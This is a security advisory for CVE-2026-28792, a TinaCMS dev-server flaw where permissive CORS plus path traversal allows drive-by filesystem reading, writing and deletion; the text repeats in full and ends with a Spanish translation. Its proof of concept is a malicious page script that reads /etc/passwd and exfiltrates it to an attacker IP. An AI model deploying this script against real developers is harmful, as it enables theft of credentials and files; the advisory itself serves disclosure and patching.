CVE-2026-28792

Tina is a headless content management system. Prior to 2.1.8 , the TinaCMS CLI dev server combines a permissive CORS configuration (Access-Control-Allow-Origin: *) with the path traversal vulnerability (previously reported) to enable a browser-based drive-by attack. A remote attacker can enumerate the filesystem, write arbitrary files, and delete arbitrary files on developer's machines by simply tricking them into visiting a malicious website while tinacms dev is running. This vulnerability is fixed in 2.1.8.

Tina is a headless content management system. Prior to 2.1.8 , the TinaCMS CLI dev server combines a permissive CORS configuration (Access-Control-Allow-Origin: *) with the path traversal vulnerability (previously reported) to enable a browser-based drive-by attack. A remote attacker can enumerate the filesystem, write arbitrary files, and delete arbitrary files on developer's machines by simply tricking them into visiting a malicious website while tinacms dev is running. This vulnerability is fixed in 2.1.8.

## Summary The TinaCMS CLI dev server combines a permissive CORS configuration (Access-Control-Allow-Origin: *) with the path traversal vulnerability (previously reported) to enable a browser-based drive-by attack. A remote attacker can enumerate the filesystem, write arbitrary files, and delete arbitrary files on developer's machines by simply tricking them into visiting a malicious website while tinacms dev is running. ## Details The TinaCMS dev server sets permissive CORS headers that allow **any origin** to make cross-origin requests: - packages/@tinacms/cli/src/server/server.ts: ``` app.use(cors()); ``` - packages/@tinacms/cli/src/next/vite/plugins.ts: ``` server.middlewares.use(cors()); ``` When combined with the path traversal vulnerability, this creates a complete attack chain. ## Attack Scenario ### Prerequisites 1. Developer runs `tinacms dev` (default port 4001) 2. Developer visits attacker's website while TinaCMS is running **No other conditions required** - the dev server doesn't need to be: - Exposed to the internet - Bound to 0.0.0.0 - Accessible outside localhost ### Attack Flow 1. Developer starts TinaCMS: `tinacms dev` 2. Developer browses the web (checking email, social media, etc.) 3. Developer unknowingly visits attacker-controlled page (malicious ad, compromised site, etc.) 4. Attacker's JavaScript exploits CORS + path traversal to read sensitive files 5. Files are exfiltrated to attacker's server ## PoC ### Attacker's Malicious Website (evil.html): ``` <script> fetch('http://localhost:4001/../../../etc/passwd') .then(r => r.text()) .then(data => { // Exfil via GET const img = new Image(); img.src = 'http://192.168.11.117:8080/exfil?data=' + encodeURIComponent(data); }); </script> ``` ### Demonstration **Step 1:** Start TinaCMS dev server ```bash tinacms dev # Server running on http://localhost:4001 ``` **Step 2:** Host evil.html on attacker server ```bash python3 -m http.server 8000 ``` **Step 3:** Developer visits `http://attacker-server:8000/evil.html` **Result:** The browser makes cross-origin requests to localhost:4001. Because cors() returns Access-Control-Allow-Origin: *, the browser allows the JavaScript to read the responses. Directory listings from outside the media directory are sent to the attacker's server. <img width="1900" height="366" alt="image" src="https://github.com/user-attachments/assets/72fdd31d-dd93-4728-9a4b-4d7d66d33617" /> ## Impact ### Who is affected Every developer running `tinacms dev` is vulnerable while the dev server is active. No special configuration is required the default setup is exploitable. ### What an attacker achieves By hosting a malicious webpage (or injecting script via a compromised ad network, XSS on a forum, etc.), the attacker can silently: 1. **Enumerate the developer's filesystem** directory listings via `/media/list/` with path traversal reveal file and folder names across the entire filesystem 2. **Discover sensitive files** locate `.env`, `.git/config`, SSH keys, cloud credentials, database configs 3. **Write arbitrary files** via `/media/upload/` with path traversal, the attacker can overwrite project source files, inject backdoors, or modify build scripts 4. **Delete arbitrary files** via `/media/` DELETE with path traversal

## Summary The TinaCMS CLI dev server combines a permissive CORS configuration (Access-Control-Allow-Origin: *) with the path traversal vulnerability (previously reported) to enable a browser-based drive-by attack. A remote attacker can enumerate the filesystem, write arbitrary files, and delete arbitrary files on developer's machines by simply tricking them into visiting a malicious website while tinacms dev is running. ## Details The TinaCMS dev server sets permissive CORS headers that allow **any origin** to make cross-origin requests: - packages/@tinacms/cli/src/server/server.ts: ``` app.use(cors()); ``` - packages/@tinacms/cli/src/next/vite/plugins.ts: ``` server.middlewares.use(cors()); ``` When combined with the path traversal vulnerability, this creates a complete attack chain. ## Attack Scenario ### Prerequisites 1. Developer runs `tinacms dev` (default port 4001) 2. Developer visits attacker's website while TinaCMS is running **No other conditions required** - the dev server doesn't need to be: - Exposed to the internet - Bound to 0.0.0.0 - Accessible outside localhost ### Attack Flow 1. Developer starts TinaCMS: `tinacms dev` 2. Developer browses the web (checking email, social media, etc.) 3. Developer unknowingly visits attacker-controlled page (malicious ad, compromised site, etc.) 4. Attacker's JavaScript exploits CORS + path traversal to read sensitive files 5. Files are exfiltrated to attacker's server ## PoC ### Attacker's Malicious Website (evil.html): ``` <script> fetch('http://localhost:4001/../../../etc/passwd') .then(r => r.text()) .then(data => { // Exfil via GET const img = new Image(); img.src = 'http://192.168.11.117:8080/exfil?data=' + encodeURIComponent(data); }); </script> ``` ### Demonstration **Step 1:** Start TinaCMS dev server ```bash tinacms dev # Server running on http://localhost:4001 ``` **Step 2:** Host evil.html on attacker server ```bash python3 -m http.server 8000 ``` **Step 3:** Developer visits `http://attacker-server:8000/evil.html` **Result:** The browser makes cross-origin requests to localhost:4001. Because cors() returns Access-Control-Allow-Origin: *, the browser allows the JavaScript to read the responses. Directory listings from outside the media directory are sent to the attacker's server. <img width="1900" height="366" alt="image" src="https://github.com/user-attachments/assets/72fdd31d-dd93-4728-9a4b-4d7d66d33617" /> ## Impact ### Who is affected Every developer running `tinacms dev` is vulnerable while the dev server is active. No special configuration is required the default setup is exploitable. ### What an attacker achieves By hosting a malicious webpage (or injecting script via a compromised ad network, XSS on a forum, etc.), the attacker can silently: 1. **Enumerate the developer's filesystem** directory listings via `/media/list/` with path traversal reveal file and folder names across the entire filesystem 2. **Discover sensitive files** locate `.env`, `.git/config`, SSH keys, cloud credentials, database configs 3. **Write arbitrary files** via `/media/upload/` with path traversal, the attacker can overwrite project source files, inject backdoors, or modify build scripts 4. **Delete arbitrary files** via `/media/` DELETE with path traversal

Tina es un sistema de gestión de contenido sin cabeza. Previo a la 2.1.8, el servidor de desarrollo CLI de TinaCMS combina una configuración CORS permisiva (Access-Control-Allow-Origin: *) con la vulnerabilidad de salto de ruta (previamente reportada) para permitir un ataque drive-by basado en el navegador. Un atacante remoto puede enumerar el sistema de archivos, escribir archivos arbitrarios y eliminar archivos arbitrarios en las máquinas de los desarrolladores simplemente engañándolos para que visiten un sitio web malicioso mientras tinacms dev está en ejecución. Esta vulnerabilidad está corregida en la 2.1.8.